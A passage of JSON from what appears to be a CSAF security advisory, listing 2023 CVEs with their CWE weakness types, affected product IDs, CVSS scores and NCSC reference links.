"CSAFPID-611390",
"CSAFPID-611394",
"CSAFPID-611417",
"CSAFPID-764250",
"CSAFPID-764752",
"CSAFPID-912044",
"CSAFPID-912045",
"CSAFPID-912046",
"CSAFPID-912561",
"CSAFPID-912567",
"CSAFPID-912600",
"CSAFPID-912601",
"CSAFPID-1503575",
"CSAFPID-1503603",
"CSAFPID-1503612",
"CSAFPID-1503640",
"CSAFPID-1503299",
"CSAFPID-1503302",
"CSAFPID-1503306",
"CSAFPID-1503661",
"CSAFPID-1503663"
]
}
],
"title": "CVE-2023-2976"
},
{
"cve": "CVE-2023-4043",
"cwe": {
"id": "CWE-834",
"name": "Excessive Iteration"
},
"notes": [
{
"category": "other",
"text": "Excessive Iteration",
"title": "CWE-834"
},
{
"category": "other",
"text": "Improper Input Validation",
"title": "CWE-20"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1673405",
"CSAFPID-1673397",
"CSAFPID-220643",
"CSAFPID-342816",
"CSAFPID-667692",
"CSAFPID-764250",
"CSAFPID-764813",
"CSAFPID-816317",
"CSAFPID-816361",
"CSAFPID-816798",
"CSAFPID-816799",
"CSAFPID-816800",
"CSAFPID-816801",
"CSAFPID-816845",
"CSAFPID-816846",
"CSAFPID-816852",
"CSAFPID-816853",
"CSAFPID-816854",
"CSAFPID-816855",
"CSAFPID-816870",
"CSAFPID-816871",
"CSAFPID-764275",
"CSAFPID-764752",
"CSAFPID-912044",
"CSAFPID-912045",
"CSAFPID-912046",
"CSAFPID-912561",
"CSAFPID-912567",
"CSAFPID-912600",
"CSAFPID-912601",
"CSAFPID-1503575",
"CSAFPID-1503603",
"CSAFPID-1503612",
"CSAFPID-1503640",
"CSAFPID-1503299",
"CSAFPID-1503302",
"CSAFPID-1503306",
"CSAFPID-1503661",
"CSAFPID-1503663"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2023-4043",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2023/CVE-2023-4043.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1673405",
"CSAFPID-1673397",
"CSAFPID-220643",
"CSAFPID-342816",
"CSAFPID-667692",
"CSAFPID-764250",
"CSAFPID-764813",
"CSAFPID-816317",
"CSAFPID-816361",
"CSAFPID-816798",
"CSAFPID-816799",
"CSAFPID-816800",
"CSAFPID-816801",
"CSAFPID-816845",
"CSAFPID-816846",
"CSAFPID-816852",
"CSAFPID-816853",
"CSAFPID-816854",
"CSAFPID-816855",
"CSAFPID-816870",
"CSAFPID-816871",
"CSAFPID-764275",
"CSAFPID-764752",
"CSAFPID-912044",
"CSAFPID-912045",
"CSAFPID-912046",
"CSAFPID-912561",
"CSAFPID-912567",
"CSAFPID-912600",
"CSAFPID-912601",
"CSAFPID-1503575",
"CSAFPID-1503603",
"CSAFPID-1503612",
"CSAFPID-1503640",
"CSAFPID-1503299",
"CSAFPID-1503302",
"CSAFPID-1503306",
"CSAFPID-1503661",
"CSAFPID-1503663"
]
}
],
"title": "CVE-2023-4043"
},
{
"cve": "CVE-2023-4759",
"cwe": {
"id": "CWE-59",
"name": "Improper Link Resolution Before File Access (\u0027Link Following\u0027)"
},
"notes": [
{
"category": "other",
"text": "Improper Link Resolution Before File Access (\u0027Link Following\u0027)",
"title": "CWE-59"
},
{
"category": "other",
"text": "Improper Handling of Case Sensitivity",
"title": "CWE-178"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1673397",
"CSAFPID-1503575",
"CSAFPID-1503603",
"CSAFPID-764250",
"CSAFPID-1503612",
"CSAFPID-1503640",
"CSAFPID-342816",
"CSAFPID-816845",
"CSAFPID-816846",
"CSAFPID-1503299",
"CSAFPID-1503302",
"CSAFPID-1503306",
"CSAFPID-1503661",
"CSAFPID-1503663",
"CSAFPID-764813"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2023-4759",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2023/CVE-2023-4759.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1673397",
"CSAFPID-1503575",
"CSAFPID-1503603",
"CSAFPID-764250",
"CSAFPID-1503612",
"CSAFPID-1503640",
"CSAFPID-342816",
"CSAFPID-816845",
"CSAFPID-816846",
"CSAFPID-1503299",
"CSAFPID-1503302",
"CSAFPID-1503306",
"CSAFPID-1503661",
"CSAFPID-1503663",
"CSAFPID-764813"
]
}
],
"title": "CVE-2023-4759"
},
{
"cve": "CVE-2023-4863",
"cwe": {
"id": "CWE-122",
"name": "Heap-based Buffer Overflow"
},
"notes": [
{
"category": "other",
"text": "Heap-based Buffer Overflow",
"title": "CWE-122"
},
{
"category": "other",
"text": "Improper Restriction of Operations within the Bounds of a Memory Buffer",
"title": "CWE-119"
},
{
"category": "other",
"text": "Out-of-bounds Write",
"title": "CWE-787"
}
],
"product_status": {
"known_affected": [
"CSAFPID-89587",
"CSAFPID-816846",
"CSAFPID-912044",
"CSAFPID-912045",
"CSAFPID-912046",
"CSAFPID-342816",
"CSAFPID-912561",
"CSAFPID-912567",
"CSAFPID-912600",
"CSAFPID-912601",
"CSAFPID-764275",
"CSAFPID-764752",
"CSAFPID-816798",
"CSAFPID-816801"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2023-4863",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2023/CVE-2023-4863.json"
}
],
"title": "CVE-2023-4863"
},
{
"cve": "CVE-2023-5072",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"notes": [
{
"category": "other",
"text": "Allocation of Resources Without Limits or Throttling",
"title": "CWE-770"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1650575",
"CSAFPID-1650515",
"CSAFPID-1650835",
"CSAFPID-89587",
"CSAFPID-220643",
"CSAFPID-342816",
"CSAFPID-667692",
"CSAFPID-764250",
"CSAFPID-764813",
"CSAFPID-816317",
"CSAFPID-816361",
"CSAFPID-816798",
"CSAFPID-816799",
"CSAFPID-816800",
"CSAFPID-816801",
"CSAFPID-816845",
"CSAFPID-816846",
"CSAFPID-816852",
"CSAFPID-816853",
"CSAFPID-816854",
"CSAFPID-816855",
"CSAFPID-816870",
"CSAFPID-816871",
"CSAFPID-764275",
"CSAFPID-764752",
"CSAFPID-912044",
"CSAFPID-912045",
"CSAFPID-912046",
"CSAFPID-912561",
"CSAFPID-912567",
"CSAFPID-912600",
"CSAFPID-912601",
"CSAFPID-1503575",
"CSAFPID-1503603",
"CSAFPID-1503612",
"CSAFPID-1503640",
"CSAFPID-1503299",
"CSAFPID-1503302",
"CSAFPID-1503306",
"CSAFPID-1503661",
"CSAFPID-1503663"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2023-5072",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2023/CVE-2023-5072.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1650575",
"CSAFPID-1650515",
"CSAFPID-1650835",
"CSAFPID-89587",
"CSAFPID-220643",
"CSAFPID-342816",
"CSAFPID-667692",
"CSAFPID-764250",
"CSAFPID-764813",
"CSAFPID-816317",
"CSAFPID-816361",
"CSAFPID-816798",
"CSAFPID-816799",
"CSAFPID-816800",
"CSAFPID-816801",
"CSAFPID-816845",
"CSAFPID-816846",
"CSAFPID-816852",
"CSAFPID-816853",
"CSAFPID-816854",
"CSAFPID-816855",
"CSAFPID-816870",
"CSAFPID-816871",
"CSAFPID-764275",
"CSAFPID-764752",
"CSAFPID-912044",
"CSAFPID-912045",
"CSAFPID-912046",
"CSAFPID-912561",
"CSAFPID-912567",
"CSAFPID-912600",
"CSAFPID-912601",
"CSAFPID-1503575",
"CSAFPID-1503603",
"CSAFPID-1503612",
"CSAFPID-1503640",
"CSAFPID-1503299",
"CSAFPID-1503302",
"CSAFPID-1503306",
"CSAFPID-1503661",
"CSAFPID-1503663"
]
}
],
"title": "CVE-2023-5072"
},
{
"cve": "CVE-2023-26031",
"cwe": {
"id": "CWE-426",
"name": "Untrusted Search Path"
},
"notes": [
{
"category": "other",
"text": "Untrusted Search Path",
"title": "CWE-426"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1673384",
"CSAFPID-1503575",
"CSAFPID-1503603",
"CSAFPID-764250",
"CSAFPID-1503612",
"CSAFPID-1503640",
"CSAFPID-342816",
"CSAFPID-816845",
"CSAFPID-816846",
"CSAFPID-1503299",
"CSAFPID-1503302",
"CSAFPID-1503306",
"CSAFPID-1503661",
"CSAFPID-1503663",
"CSAFPID-764813"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2023-26031",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2023/CVE-2023-26031.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1673384",
"CSAFPID-1503575",
"CSAFPID-1503603",
"CSAFPID-764250",
"CSAFPID-1503612",
"CSAFPID-1503640",
"CSAFPID-342816",
"CSAFPID-816845",
"CSAFPID-816846",
"CSAFPID-1503299",
"CSAFPID-1503302",
"CSAFPID-1503306",
"CSAFPID-1503661",
"CSAFPID-1503663",
"CSAFPID-764813"
]
}
],
"title": "CVE-2023-26031"
},
{
"cve": "CVE-2023-26551",
"product_status": {
"known_affected": [
"CSAFPID-89587"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2023-26551",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2023/CVE-2023-26551.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 0.0,
"baseSeverity": "NONE",
"vectorString": "CVSS:3.1/AV:P/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-89587"
]
}
],
"title": "CVE-2023-26551"
},
{
"cve": "CVE-2023-26552",
"cwe": {
"id": "CWE-787",
"name": "Out-of-bounds Write"
},
"notes": [
{
"category": "other",
"text": "Out-of-bounds Write",
"title": "CWE-787"
}
],
"product_status": {
"known_affected": [
"CSAFPID-89587"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2023-26552",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2023/CVE-2023-26552.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"CSAFPID-89587"
]
}
],
"title": "CVE-2023-26552"
},
{
"cve": "CVE-2023-26553",
"cwe": {
"id": "CWE-787",
"name": "Out-of-bounds Write"
},
"notes": [
{
"category": "other",
"text": "Out-of-bounds Write",
"title": "CWE-787"
}
],
"product_status": {
"known_affected": [
"CSAFPID-89587"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2023-26553",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2023/CVE-2023-26553.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"CSAFPID-89587"
]
}
],
"title": "CVE-2023-26553"
},
{
"cve": "CVE-2023-26554",
"cwe": {
"id": "CWE-787",
"name": "Out-of-bounds Write"
},
"notes": [
{
"category": "other",
"text": "Out-of-bounds Write",
"title": "CWE-787"
}
],
"product_status": {
"known_affected": [
"CSAFPID-89587"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2023-26554",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2023/CVE-2023-26554.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"CSAFPID-89587"
]
}
],
"title": "CVE-2023-26554"
},
{
"cve": "CVE-2023-26555",
"product_status": {
"known_affected": [
"CSAFPID-89587"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2023-26555",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2023/CVE-2023-26555.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:P/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-89587"
]
}
],
"title": "CVE-2023-26555"
},
{
"cve": "CVE-2023-28484",
"cwe": {
"id": "CWE-20",
"name": "Improper Input Validation"
},
"notes": [
{
"category": "other",
"text": "Improper Input Validation",
"title": "CWE-20"
},
{
"category": "other",
"text": "NULL Pointer Dereference",
"title": "CWE-476"
}
],
"product_status": {
"known_affected": [
"CSAFPID-764250",
"CSAFPID-764731",
"CSAFPID-764732",
"CSAFPID-764733",
"CSAFPID-220886",
"CSAFPID-816317",
"CSAFPID-764813",
"CSAFPID-89587",
"CSAFPID-342816",
"CSAFPID-345049",
"CSAFPID-764752",
"CSAFPID-764764",
"CSAFPID-764765",
"CSAFPID-764766",
"CSAFPID-764767",
"CSAFPID-611390",
"CSAFPID-611394",
"CSAFPID-611417",
"CSAFPID-764274",
"CSAFPID-764275",
"CSAFPID-220643",
"CSAFPID-667692",
"CSAFPID-816361",
"CSAFPID-816798",
"CSAFPID-816799",
"CSAFPID-816800",
"CSAFPID-816801",
"CSAFPID-816845",
"CSAFPID-816846",
"CSAFPID-816852",
"CSAFPID-816853",
"CSAFPID-816854",
"CSAFPID-816855",
"CSAFPID-816870",
"CSAFPID-816871"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2023-28484",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2023/CVE-2023-28484.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C",
"version": "3.1"
},
"products": [
"CSAFPID-764250",
"CSAFPID-764731",
"CSAFPID-764732",
"CSAFPID-764733",
"CSAFPID-220886",
"CSAFPID-816317",
"CSAFPID-764813",
"CSAFPID-89587",
"CSAFPID-342816",
"CSAFPID-345049",
"CSAFPID-764752",
"CSAFPID-764764",
"CSAFPID-764765",
"CSAFPID-764766",
"CSAFPID-764767",
"CSAFPID-611390",
"CSAFPID-611394",
"CSAFPID-611417",
"CSAFPID-764274",
"CSAFPID-764275",
"CSAFPID-220643",
"CSAFPID-667692",
"CSAFPID-816361",
"CSAFPID-816798",
"CSAFPID-816799",
"CSAFPID-816800",
"CSAFPID-816801",
"CSAFPID-816845",
"CSAFPID-816846",
"CSAFPID-816852",
"CSAFPID-816853",
"CSAFPID-816854",
"CSAFPID-816855",
"CSAFPID-816870",
"CSAFPID-816871"
]
}
],
"title": "CVE-2023-28484"
},
{
"cve": "CVE-2023-29469",
"cwe": {
"id": "CWE-20",
"name": "Improper Input Validation"
},
"notes": [
{
"category": "other",
"text": "Improper Input Validation",
"title": "CWE-20"
},
{
"category": "other",
"text": "Double Free",
"title": "CWE-415"
}
],
"product_status": {
"known_affected": [
"CSAFPID-611417",
"CSAFPID-764731",
"CSAFPID-764732",
"CSAFPID-764733",
"CSAFPID-816317",
"CSAFPID-89587",
"CSAFPID-220886",
"CSAFPID-342816",
"CSAFPID-345049",
"CSAFPID-764752",
"CSAFPID-611390",
"CSAFPID-611394",
"CSAFPID-764764",
"CSAFPID-764765",
"CSAFPID-764766",
"CSAFPID-764767",
"CSAFPID-764274",
"CSAFPID-764275",
"CSAFPID-220643",
"CSAFPID-667692",
"CSAFPID-764813",
"CSAFPID-816361",
"CSAFPID-816798",
"CSAFPID-816799",
"CSAFPID-816800",
"CSAFPID-816801",
"CSAFPID-764250",
"CSAFPID-816845",
"CSAFPID-816846",
"CSAFPID-816852",
"CSAFPID-816853",
"CSAFPID-816854",
"CSAFPID-816855",
"CSAFPID-816870",
"CSAFPID-816871"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2023-29469",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2023/CVE-2023-29469.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C",
"version": "3.1"
},
"products": [
"CSAFPID-611417",
"CSAFPID-764731",
"CSAFPID-764732",
"CSAFPID-764733",
"CSAFPID-816317",
"CSAFPID-89587",
"CSAFPID-220886",
"CSAFPID-342816",
"CSAFPID-345049",
"CSAFPID-764752",
"CSAFPID-611390",
"CSAFPID-611394",
"CSAFPID-764764",
"CSAFPID-764765",
"CSAFPID-764766",
"CSAFPID-764767",
"CSAFPID-764274",
"CSAFPID-764275",
"CSAFPID-220643",
"CSAFPID-667692",
"CSAFPID-764813",
"CSAFPID-816361",
"CSAFPID-816798",
"CSAFPID-816799",
"CSAFPID-816800",
"CSAFPID-816801",
"CSAFPID-764250",
"CSAFPID-816845",
"CSAFPID-816846",
"CSAFPID-816852",
"CSAFPID-816853",
"CSAFPID-816854",
"CSAFPID-816855",
"CSAFPID-816870",
"CSAFPID-816871"
]
}
],
"title": "CVE-2023-29469"
},
{
"cve": "CVE-2023-33201",
"cwe": {
"id": "CWE-200",
"name": "Exposure of Sensitive Information to an Unauthorized Actor"
},
"notes": [
{
"category": "other",
"text": "Exposure of Sensitive Information to an Unauthorized Actor",
"title": "CWE-200"
}
],
"product_status": {
"known_affected": [
"CSAFPID-764250",
"CSAFPID-611394",
"CSAFPID-1650584",
"CSAFPID-1673397",
"CSAFPID-912561",
"CSAFPID-345049",
"CSAFPID-611390",
"CSAFPID-611417",
"CSAFPID-764274",
"CSAFPID-764275",
"CSAFPID-220643",
"CSAFPID-342816",
"CSAFPID-667692",
"CSAFPID-764813",
"CSAFPID-816317",
"CSAFPID-816845",
"CSAFPID-816846",
"CSAFPID-816852",
"CSAFPID-816853",
"CSAFPID-816854",
"CSAFPID-816361",
"CSAFPID-816798",
"CSAFPID-816799",
"CSAFPID-816800",
"CSAFPID-816801",
"CSAFPID-764752",
"CSAFPID-912044",
"CSAFPID-912045",
"CSAFPID-912046",
"CSAFPID-816855",
"CSAFPID-816870",
"CSAFPID-816871",
"CSAFPID-912567",
"CSAFPID-912600",
"CSAFPID-912601",
"CSAFPID-1503575",
"CSAFPID-1503603",
"CSAFPID-1503612",
"CSAFPID-1503640",
"CSAFPID-1503299",
"CSAFPID-1503302",
"CSAFPID-1503306",
"CSAFPID-1503661",
"CSAFPID-1503663"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2023-33201",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2023/CVE-2023-33201.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-764250",
"CSAFPID-611394",
"CSAFPID-1650584",
"CSAFPID-1673397",
"CSAFPID-912561",
"CSAFPID-345049",
"CSAFPID-611390",
"CSAFPID-611417",
"CSAFPID-764274",
"CSAFPID-764275",
"CSAFPID-220643",
"CSAFPID-342816",
"CSAFPID-667692",
"CSAFPID-764813",
"CSAFPID-816317",
"CSAFPID-816845",
"CSAFPID-816846",
"CSAFPID-816852",
"CSAFPID-816853",
"CSAFPID-816854",
"CSAFPID-816361",
"CSAFPID-816798",
"CSAFPID-816799",
"CSAFPID-816800",
"CSAFPID-816801",
"CSAFPID-764752",
"CSAFPID-912044",
"CSAFPID-912045",
"CSAFPID-912046",
"CSAFPID-816855",
"CSAFPID-816870",
"CSAFPID-816871",
"CSAFPID-912567",
"CSAFPID-912600",
"CSAFPID-912601",
"CSAFPID-1503575",
"CSAFPID-1503603",
"CSAFPID-1503612",
"CSAFPID-1503640",
"CSAFPID-1503299",
"CSAFPID-1503302",
"CSAFPID-1503306",
"CSAFPID-1503661",
"CSAFPID-1503663"
]
}
],
"title": "CVE-2023-33201"
},
{
"cve": "CVE-2023-37920",
"cwe": {
"id": "CWE-295",
"name": "Improper Certificate Validation"
},
"notes": [
{
"category": "other",
"text": "Improper Certificate Validation",
"title": "CWE-295"
},
{
"category": "other",
"text": "Insufficient Verification of Data Authenticity",
"title": "CWE-345"
}
],
"product_status": {
"known_affected": [
"CSAFPID-89587",
"CSAFPID-1503575",
"CSAFPID-1503640",
"CSAFPID-342816",
"CSAFPID-816845",
"CSAFPID-816846",
"CSAFPID-1503299",
"CSAFPID-1503302",
"CSAFPID-1503306",
"CSAFPID-1503661",
"CSAFPID-1503663",
"CSAFPID-764813",
"CSAFPID-1503603",
"CSAFPID-764250",
"CSAFPID-1503612"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2023-37920",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2023/CVE-2023-37920.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-89587",
"CSAFPID-1503575",
"CSAFPID-1503640",
"CSAFPID-342816",
"CSAFPID-816845",
"CSAFPID-816846",
"CSAFPID-1503299",
"CSAFPID-1503302",
"CSAFPID-1503306",
"CSAFPID-1503661",
"CSAFPID-1503663",
"CSAFPID-764813",
"CSAFPID-1503603",
"CSAFPID-764250",
"CSAFPID-1503612"
]
}
],
"title": "CVE-2023-37920"
},
{
"cve": "CVE-2023-39410",
"cwe": {
"id": "CWE-502",
"name": "Deserialization of Untrusted Data"
},
"notes": [
{
"category": "other",
"text": "Deserialization of Untrusted Data",
"title": "CWE-502"
},
{
"category": "other",
"text": "Improper Input Validation",
"title": "CWE-20"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1673404",
"CSAFPID-1673384",
"CSAFPID-220643",
"CSAFPID-342816",
"CSAFPID-667692",
"CSAFPID-764250",
"CSAFPID-764813",
"CSAFPID-816317",
"CSAFPID-816361",
"CSAFPID-816798",
"CSAFPID-816799",
"CSAFPID-816800",
"CSAFPID-816801",
"CSAFPID-816845",
"CSAFPID-816846",
"CSAFPID-816852",
"CSAFPID-816853",
"CSAFPID-816854",
"CSAFPID-816855",
"CSAFPID-816870",
"CSAFPID-816871"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2023-39410",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2023/CVE-2023-39410.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1673404",
"CSAFPID-1673384",
"CSAFPID-220643",
"CSAFPID-342816",
"CSAFPID-667692",
"CSAFPID-764250",
"CSAFPID-764813",
"CSAFPID-816317",
"CSAFPID-816361",
"CSAFPID-816798",
"CSAFPID-816799",
"CSAFPID-816800",
"CSAFPID-816801",
"CSAFPID-816845",
"CSAFPID-816846",
"CSAFPID-816852",
"CSAFPID-816853",
"CSAFPID-816854",
"CSAFPID-816855",
"CSAFPID-816870",
"CSAFPID-816871"
]
}
],
"title": "CVE-2023-39410"
},
{
"cve": "CVE-2023-44487",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"notes": [
{
"category": "other",
"text": "Uncontrolled Resource Consumption",
"title": "CWE-400"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1650757",
"CSAFPID-1650758",
"CSAFPID-1650759",
"CSAFPID-1650760",
"CSAFPID-1650761",
"CSAFPID-89587",
"CSAFPID-816361",
"CSAFPID-220643",
"CSAFPID-342816",
"CSAFPID-816845",
"CSAFPID-816846",
"CSAFPID-816852",
"CSAFPID-816853",
"CSAFPID-816854",
"CSAFPID-816855",
"CSAFPID-816870",
"CSAFPID-816871",
"CSAFPID-667692",
"CSAFPID-764250",
"CSAFPID-764813",
"CSAFPID-816317",
"CSAFPID-816798",
"CSAFPID-816799",
"CSAFPID-816800",
"CSAFPID-816801",
"CSAFPID-764275",
"CSAFPID-764752",
"CSAFPID-912044",
"CSAFPID-912045",
"CSAFPID-912046",
"CSAFPID-912561",
"CSAFPID-912567",
"CSAFPID-912600",
"CSAFPID-912601",
"CSAFPID-1503603",
"CSAFPID-1503575",
"CSAFPID-1503612",
"CSAFPID-1503640",
"CSAFPID-1503299",
"CSAFPID-1503302",
"CSAFPID-1503306",
"CSAFPID-1503661",
"CSAFPID-1503663"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2023-44487",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2023/CVE-2023-44487.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1650757",
"CSAFPID-1650758",
"CSAFPID-1650759",
"CSAFPID-1650760",
"CSAFPID-1650761",
"CSAFPID-89587",
"CSAFPID-816361",
"CSAFPID-220643",
"CSAFPID-342816",
"CSAFPID-816845",
"CSAFPID-816846",
"CSAFPID-816852",
"CSAFPID-816853",
"CSAFPID-816854",
"CSAFPID-816855",
"CSAFPID-816870",
"CSAFPID-816871",
"CSAFPID-667692",
"CSAFPID-764250",
"CSAFPID-764813",
"CSAFPID-816317",
"CSAFPID-816798",
"CSAFPID-816799",
"CSAFPID-816800",
"CSAFPID-816801",
"CSAFPID-764275",
"CSAFPID-764752",
"CSAFPID-912044",
"CSAFPID-912045",
"CSAFPID-912046",
"CSAFPID-912561",
"CSAFPID-912567",
"CSAFPID-912600",
"CSAFPID-912601",
"CSAFPID-1503603",
"CSAFPID-1503575",
"CSAFPID-1503612",
"CSAFPID-1503640",
"CSAFPID-1503299",
"CSAFPID-1503302",
"CSAFPID-1503306",
"CSAFPID-1503661",
"CSAFPID-1503663"
]
}
],
"title": "CVE-2023-44487"
},
{
"cve": "CVE-2023-44981",
"cwe": {
"id": "CWE-639",
"name": "Authorization Bypass Through User-Controlled Key"
},
"notes": [
{
"category": "other",
"text": "Authorization Bypass Through User-Controlled Key",
"title": "CWE-639"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1650515",
"CSAFPID-89587",
"CSAFPID-220643",
"CSAFPID-342816",
"CSAFPID-667692",
"CSAFPID-764250",
"CSAFPID-764813",
"CSAFPID-816317",
"CSAFPID-816361",
"CSAFPID-816798",
"CSAFPID-816799",
"CSAFPID-816800",
"CSAFPID-816801",
"CSAFPID-816845",
"CSAFPID-816846",
"CSAFPID-816852",
"CSAFPID-816853",
"CSAFPID-816854",
"CSAFPID-816855",
"CSAFPID-816870",
"CSAFPID-816871",
"CSAFPID-764275",
"CSAFPID-764752",
"CSAFPID-912044",
"CSAFPID-912045",
"CSAFPID-912046",
"CSAFPID-912561",
"CSAFPID-912567",
"CSAFPID-912600",
"CSAFPID-912601"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2023-44981",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2023/CVE-2023-44981.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-1650515",
"CSAFPID-89587",
"CSAFPID-220643",
"CSAFPID-342816",
"CSAFPID-667692",
"CSAFPID-764250",
"CSAFPID-764813",
"CSAFPID-816317",
"CSAFPID-816361",
"CSAFPID-816798",
"CSAFPID-816799",
"CSAFPID-816800",
"CSAFPID-816801",
"CSAFPID-816845",
"CSAFPID-816846",
"CSAFPID-816852",
"CSAFPID-816853",
"CSAFPID-816854",
"CSAFPID-816855",
"CSAFPID-816870",
"CSAFPID-816871",
"CSAFPID-764275",
"CSAFPID-764752",
"CSAFPID-912044",
"CSAFPID-912045",
"CSAFPID-912046",
"CSAFPID-912561",
"CSAFPID-912567",
"CSAFPID-912600",
"CSAFPID-912601"
]
}
],
"title": "CVE-2023-44981"
},
{
"cve": "CVE-2023-45288",
"cwe": {
"id": "CWE-404",
"name": "Improper Resource Shutdown or Release"
},
"notes": [
{
"category": "other",
"text": "Improper Resource Shutdown or Release",
"title": "CWE-404"
},
{
"category": "other",
"text": "Uncontrolled Resource Consumption",
"title": "CWE-400"
}
],
"product_status": {
"known_affected": [
"CSAFPID-89587"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2023-45288",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2023/CVE-2023-45288.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
